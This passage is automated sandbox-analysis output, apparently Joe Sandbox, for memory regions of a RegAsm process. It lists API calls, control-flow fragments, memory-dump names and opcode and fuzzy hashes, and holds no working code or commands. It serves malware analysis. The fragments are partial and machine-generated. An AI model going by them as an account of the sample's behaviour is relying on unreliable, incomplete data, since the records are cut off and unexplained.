                                                                                                                                                                              control_flow_graph 859 bc4248-bc5a01 CreateActCtxA 862 bc5a0a-bc5a64 859->862 863 bc5a03-bc5a09 859->863 870 bc5a66-bc5a69 862->870 871 bc5a73-bc5a77 862->871 863->862 870->871 872 bc5a88 871->872 873 bc5a79-bc5a85 871->873 875 bc5a89 872->875 873->872 875->875
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 00BC59F1
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1979212194.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_bc0000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Create
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2289755597-0
                                                                                                                                                                              • Opcode ID: ff3b03f9a71573b250ab23f740b985f52f379f17a2f559b627b947cedde4ab11
                                                                                                                                                                              • Instruction ID: d475c99e57d9309cfe22505d69a31e753141650c203bdf75bffef0b7b849785d
                                                                                                                                                                              • Opcode Fuzzy Hash: ff3b03f9a71573b250ab23f740b985f52f379f17a2f559b627b947cedde4ab11
                                                                                                                                                                              • Instruction Fuzzy Hash: 6641E3B0D00719CBDB24DFAAC884B9DBBF5FF44314F2481AAD409AB251DB756989CF90
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 876 bcc9a0-bcd394 DuplicateHandle 878 bcd39d-bcd3ba 876->878 879 bcd396-bcd39c 876->879 879->878
                                                                                                                                                                              APIs
                                                                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00BCD2C6,?,?,?,?,?), ref: 00BCD387
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1979212194.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_bc0000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: DuplicateHandle
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3793708945-0
                                                                                                                                                                              • Opcode ID: 8bf44866700c077cdad62a239739c7678c1e0b277356fe9b8b1edd183430cd78
                                                                                                                                                                              • Instruction ID: 440b8c8dc2f9daecf6e068062ccbbf3a84a751cab454b95dc3a09f0157b14786
                                                                                                                                                                              • Opcode Fuzzy Hash: 8bf44866700c077cdad62a239739c7678c1e0b277356fe9b8b1edd183430cd78
                                                                                                                                                                              • Instruction Fuzzy Hash: FF21E4B59003489FDB10CF9AD984BDEBBF4EB48320F14846AE918A3310D374A954DFA5
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00BCB101,00000800,00000000,00000000), ref: 00BCB312
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1979212194.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_bc0000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1029625771-0
                                                                                                                                                                              • Opcode ID: ba84353ba65dcec4828c620cfdc624dd0ea0505d055cc79dc00564c140715a6d
                                                                                                                                                                              • Instruction ID: 247d733d9c663dd9c4c14f0b089da161e781915475e0a5d56590d00121aedb9d
                                                                                                                                                                              • Opcode Fuzzy Hash: ba84353ba65dcec4828c620cfdc624dd0ea0505d055cc79dc00564c140715a6d
                                                                                                                                                                              • Instruction Fuzzy Hash: AE1126B68003498FDB14DFAAC845BDEFBF4EB88311F10845ED829A7200C374A945CFA5
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00BCB101,00000800,00000000,00000000), ref: 00BCB312
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1979212194.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_bc0000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1029625771-0
                                                                                                                                                                              • Opcode ID: 95d7f698084cf9662d204061ed998cd9497820ea35799c5b3e4ae5424511216b
                                                                                                                                                                              • Instruction ID: ce578d05aa9cd64483f65760e5018e7ab2fba4e38f90c14a7dca5a9a7df44f0b
                                                                                                                                                                              • Opcode Fuzzy Hash: 95d7f698084cf9662d204061ed998cd9497820ea35799c5b3e4ae5424511216b
                                                                                                                                                                              • Instruction Fuzzy Hash: B61112B6D003499FDB10DF9AC845B9EFBF4EB88325F10846EE919A7200C374A945CFA5
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 00BCB086
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1979212194.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_bc0000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: HandleModule
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4139908857-0
                                                                                                                                                                              • Opcode ID: aadbcf3fdca92d3f7842b1f6c5123d356c222776e2fcc042cf3996965fbcd13a
                                                                                                                                                                              • Instruction ID: f6bc776140ef5748b44e507def3a2e00bf31e2ccfc7e36c60b5c2fb83a4fc4d6
                                                                                                                                                                              • Opcode Fuzzy Hash: aadbcf3fdca92d3f7842b1f6c5123d356c222776e2fcc042cf3996965fbcd13a
                                                                                                                                                                              • Instruction Fuzzy Hash: 4711CDB6C007498ACB24DF9AC845B9EFBF4EB88325F14845ED829A7210C375A549CFA5
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: d
                                                                                                                                                                              • API String ID: 0-2564639436
                                                                                                                                                                              • Opcode ID: 2a78a78c8134aa5294ee7c044f595689640d1ce9d4bfe8d27b3ab618203f93b6
                                                                                                                                                                              • Instruction ID: 0cb94a3373e250d6deed75926c854955c95601aeca0590cdbdea9497c0a4bf0e
                                                                                                                                                                              • Opcode Fuzzy Hash: 2a78a78c8134aa5294ee7c044f595689640d1ce9d4bfe8d27b3ab618203f93b6
                                                                                                                                                                              • Instruction Fuzzy Hash: 77C17C75600602CFCB65DF18C88096ABBF2FF88310B25CA69D55A9B765DB30FC46CB90
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1985068451.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_6020000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 3819d99df0d3b26a931ae984403c6b581a368a1dd96b4a5510719fb8fac9ef17
                                                                                                                                                                              • Instruction ID: 2d28a146e3a4b83f24e58108e74baad962d69454d904f5ca9044747706dad265
                                                                                                                                                                              • Opcode Fuzzy Hash: 3819d99df0d3b26a931ae984403c6b581a368a1dd96b4a5510719fb8fac9ef17
                                                                                                                                                                              • Instruction Fuzzy Hash: 1CC25374B401189FDB55DF64C851AAEBBB6FF88700F108099E606AB3A1DB71EE41CF91
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: 4'^q
                                                                                                                                                                              • API String ID: 0-1614139903
                                                                                                                                                                              • Opcode ID: 3029086b65da5f08c9cbd3f29856f7a9820dd77468e08d12422a54ff9d16a021
                                                                                                                                                                              • Instruction ID: c8a822e3706b1ffaa245a377ba200641e121ba17b6a805e8559c9a065821b7be
                                                                                                                                                                              • Opcode Fuzzy Hash: 3029086b65da5f08c9cbd3f29856f7a9820dd77468e08d12422a54ff9d16a021
                                                                                                                                                                              • Instruction Fuzzy Hash: 3831EF757006204FC729A738A49166E7BE6DFCA71271948BAE0098B385DE35EC0787A0
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: 4'^q
                                                                                                                                                                              • API String ID: 0-1614139903
                                                                                                                                                                              • Opcode ID: e65a8bdfbfd309b74e99dfdd5ba7e6950b67263113703cc1c965f1cb5bb61c65
                                                                                                                                                                              • Instruction ID: 066d7b417077d29280137e219fc3d133894cef34cdaff57b65ee121b8bcb1f41
                                                                                                                                                                              • Opcode Fuzzy Hash: e65a8bdfbfd309b74e99dfdd5ba7e6950b67263113703cc1c965f1cb5bb61c65
                                                                                                                                                                              • Instruction Fuzzy Hash: 9031A1757002148FCB09EB78A55957E3BE2AFC8205754483DE50ADB385EF39ED0687E1
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: 4'^q
                                                                                                                                                                              • API String ID: 0-1614139903
                                                                                                                                                                              • Opcode ID: 8b168a5e8ef5936ac0805c33a19157597e26cad7cd0d529f0aceda3f78005d96
                                                                                                                                                                              • Instruction ID: f7e1f11352d6fa044adf22b106e9a54305fbe96b421c25374c9b5d8e9d7d1389
                                                                                                                                                                              • Opcode Fuzzy Hash: 8b168a5e8ef5936ac0805c33a19157597e26cad7cd0d529f0aceda3f78005d96
                                                                                                                                                                              • Instruction Fuzzy Hash: 7F01DF30902285EFCB05EFB8E99459CBFF2FF45301B144A9AD449D7215DF305A88CB10
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: 4'^q
                                                                                                                                                                              • API String ID: 0-1614139903
                                                                                                                                                                              • Opcode ID: 1c42c2fb074f3665fa9eba04e481265bcd078bccdda052f2aa1fec0e3d29a83b
                                                                                                                                                                              • Instruction ID: 5d9a44fdb633a21ae8643904181add2cc49c4e52586f6ee054fde30414e62972
                                                                                                                                                                              • Opcode Fuzzy Hash: 1c42c2fb074f3665fa9eba04e481265bcd078bccdda052f2aa1fec0e3d29a83b
                                                                                                                                                                              • Instruction Fuzzy Hash: 17F090353006114FC618FB29E85596F7BEADFC96123544D29E00E8B318EE34BD4687E5
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: 4'^q
                                                                                                                                                                              • API String ID: 0-1614139903
                                                                                                                                                                              • Opcode ID: d08814fb81266c3c3f770cce63f6d1c1805411d72b6691d5b8ccab33049d751e
                                                                                                                                                                              • Instruction ID: ffe71bf359716b2df0d55f20f7bb30e8d9d33d5e5847b68a3a4eddc56f0df3fa
                                                                                                                                                                              • Opcode Fuzzy Hash: d08814fb81266c3c3f770cce63f6d1c1805411d72b6691d5b8ccab33049d751e
                                                                                                                                                                              • Instruction Fuzzy Hash: 71F0AF70A02249EFCB04EFB8E48559DBBF2FB44301B1449A9D40A97318DF301E84CB50
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1985068451.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_6020000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 74926a929f6312571bb98cf32279d6f72d4fb93c21477cc449f2334d12b20c5c
                                                                                                                                                                              • Instruction ID: 7024140f2d466ea1911d37a1080bfe93b7c0798f5a9cec100cd8b3ea7156c9f6
                                                                                                                                                                              • Opcode Fuzzy Hash: 74926a929f6312571bb98cf32279d6f72d4fb93c21477cc449f2334d12b20c5c
                                                                                                                                                                              • Instruction Fuzzy Hash: C0426A707407298FCB64AF78D450A2E7AF2FF85705B408A5CD5079B391CB7AED058B86
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1985068451.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_6020000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: ec5f2c5124241b31617d7da9916de7e374e9e09c9180a40b7e767758392d22ed
                                                                                                                                                                              • Instruction ID: 6650c92ea1a838d463f6b64333330cb50a052e1d82226d74c6d7a7b722c0549c
                                                                                                                                                                              • Opcode Fuzzy Hash: ec5f2c5124241b31617d7da9916de7e374e9e09c9180a40b7e767758392d22ed
                                                                                                                                                                              • Instruction Fuzzy Hash: 5E02AB30B407258FDB549B68D454B2E7AF2FF89705F408999D5039B3A2CBBAEC45CB81
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1985068451.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_6020000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 9408f1414c41b977548b5218a20002f552aed05b5c7de0ff6ab35cf30c405507
                                                                                                                                                                              • Instruction ID: 255d3372f8a3aa5ddca4752b191f02573a9b576cd48abdcc8eb97d77a4168b6f
                                                                                                                                                                              • Opcode Fuzzy Hash: 9408f1414c41b977548b5218a20002f552aed05b5c7de0ff6ab35cf30c405507
                                                                                                                                                                              • Instruction Fuzzy Hash: 4402AD30B403258FDB549B68C858B2E7AF6FF89705F408859D5039B3A1CBBAED45CB91
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1985068451.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_6020000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: a71497e092112c845dcefb770e0337a1fd9ca24b5eebf683d0dc3e8a6b423893
                                                                                                                                                                              • Instruction ID: 7f8092274ccf6fcd4a7b3ef53a8c59859f010e132e1fe976b6e4d85c425218c0
                                                                                                                                                                              • Opcode Fuzzy Hash: a71497e092112c845dcefb770e0337a1fd9ca24b5eebf683d0dc3e8a6b423893
                                                                                                                                                                              • Instruction Fuzzy Hash: 4FF11634B402158FCB44DF69C894EAEBBF6AF89704F158099E606DB3A2DB71ED41CB50
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1985068451.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_6020000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 5d51d3a1c37e34121a0ee61700a1a65b7252cd8c592dfcc76085471635c10ad9
                                                                                                                                                                              • Instruction ID: 26b766a8da0f49921836ee753db4e1c3c352bdb17261430a5342178144297a0e
                                                                                                                                                                              • Opcode Fuzzy Hash: 5d51d3a1c37e34121a0ee61700a1a65b7252cd8c592dfcc76085471635c10ad9
                                                                                                                                                                              • Instruction Fuzzy Hash: 9FE19E34B403258FDB449B68C858B2E7BE6FF89704F508459D9039B3A1CBBAEC45CB91
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1985068451.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_6020000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 2003474120c76f08df93c18c26feb830cfc5479fcc9868090aec34111b044142
                                                                                                                                                                              • Instruction ID: efceeea6dae56a8eaada4b751bfa52314f782c03ff697f695a01a2679d0031af
                                                                                                                                                                              • Opcode Fuzzy Hash: 2003474120c76f08df93c18c26feb830cfc5479fcc9868090aec34111b044142
                                                                                                                                                                              • Instruction Fuzzy Hash: E0D15A34B40004AFD784DF99C898E9E7BA7FF48704B918069F6069B3A1CB72ED45CB61
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1985068451.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_6020000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 81687f18b05d488e3e8c77c54c20c1584f6083cec419ee70a480ae160582f6fc
                                                                                                                                                                              • Instruction ID: 101a56e7959fc53a7d8dda2ccb9ae33a1607a56c472db0f4e2645972f14f7383
                                                                                                                                                                              • Opcode Fuzzy Hash: 81687f18b05d488e3e8c77c54c20c1584f6083cec419ee70a480ae160582f6fc
                                                                                                                                                                              • Instruction Fuzzy Hash: 93C19474B403159FDB849B64C858B2A7BF6FF89704F50805AEA039B3A1CB76DC45CB91
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1985068451.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_6020000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: da8282f84bf4f797520fa9e0487afdb26f484fdf842656cd40167dfa253db877
                                                                                                                                                                              • Instruction ID: 78f0fba811d3ec272187ef36d9f7aa03f7f1ae080fc1e8296d8b2e092aa6d32a
                                                                                                                                                                              • Opcode Fuzzy Hash: da8282f84bf4f797520fa9e0487afdb26f484fdf842656cd40167dfa253db877
                                                                                                                                                                              • Instruction Fuzzy Hash: 92B17274B403159FEB849B64C858B297BF6FF89704F508059EA039B3A1CBB6EC45CB91
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1985068451.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_6020000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: a06379497f91380557a9a62ab384ad6ec22c2f10d2aa3973d665460c767316c3
                                                                                                                                                                              • Instruction ID: 215ca22e97b7bbce0c51f31e8804fbd5a47970f8183876af0c2d978b6330900b
                                                                                                                                                                              • Opcode Fuzzy Hash: a06379497f91380557a9a62ab384ad6ec22c2f10d2aa3973d665460c767316c3
                                                                                                                                                                              • Instruction Fuzzy Hash: 9CB17274B403159FEB849B64C858B2A7AF6FF89704F508059DA039B3A1CBB6EC45CB91
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: e1751ec0effd4813ba706e6097251c980eb9c8834c61a02af1e1ba8ae33d7ad9
                                                                                                                                                                              • Instruction ID: 2c98388d02fe8443f3a88be2d0fa960f3cf83e8722064168012143b80ef24e79
                                                                                                                                                                              • Opcode Fuzzy Hash: e1751ec0effd4813ba706e6097251c980eb9c8834c61a02af1e1ba8ae33d7ad9
                                                                                                                                                                              • Instruction Fuzzy Hash: 99C14978B006058FCB54DF69C484AAABBF6FF89301B1585A9E506DB366DB30EC45CF60
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 89e41780d975f0dbc7cf7a6b8c1349abd02f54896e634e20e22e241711e4df37
                                                                                                                                                                              • Instruction ID: 0ad39e390a5589ddf0a81c631282816f8b2a684673c4cd8aa30bc5d94889375d
                                                                                                                                                                              • Opcode Fuzzy Hash: 89e41780d975f0dbc7cf7a6b8c1349abd02f54896e634e20e22e241711e4df37
                                                                                                                                                                              • Instruction Fuzzy Hash: A95148B0E40258CFDB64DFAAC881BDEBFF5AF48300F148529D415AB250EB749846CF80
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 33cbb580f761be24a0eb868f6c27a1a4c43a4a6b6d51cad1c9151fe7f0695569
                                                                                                                                                                              • Instruction ID: 7055d106da9d3a3b3a085a73c6969dfd102877d9b7be41fa368446e545275bd4
                                                                                                                                                                              • Opcode Fuzzy Hash: 33cbb580f761be24a0eb868f6c27a1a4c43a4a6b6d51cad1c9151fe7f0695569
                                                                                                                                                                              • Instruction Fuzzy Hash: EF5159B1D50258DFDB64DFAAC985BDDBFF5AF48300F148529E415AB280EB749846CF80
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 16610c81d9e09cfd1997b3ab41483b7784182d3f32642ac5b03505b5b1bf6c0a
                                                                                                                                                                              • Instruction ID: fc98ca3aa655defd6aadab216aa544d4e655d6b4ec9db8c8315ca23f310b0761
                                                                                                                                                                              • Opcode Fuzzy Hash: 16610c81d9e09cfd1997b3ab41483b7784182d3f32642ac5b03505b5b1bf6c0a
                                                                                                                                                                              • Instruction Fuzzy Hash: EB313579B012109FCB55EF38D884A6ABBB6EF89341B548469E905CB355DB30ED12CBA0
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: ea1ab5a433f6fcc6de2bfb8bebc229911513e6392e75a165b97dc8c0871c202e
                                                                                                                                                                              • Instruction ID: aaea699847a530ce5f2062347fbc2e72a3d08eca107fdaa508764f8343d04d2a
                                                                                                                                                                              • Opcode Fuzzy Hash: ea1ab5a433f6fcc6de2bfb8bebc229911513e6392e75a165b97dc8c0871c202e
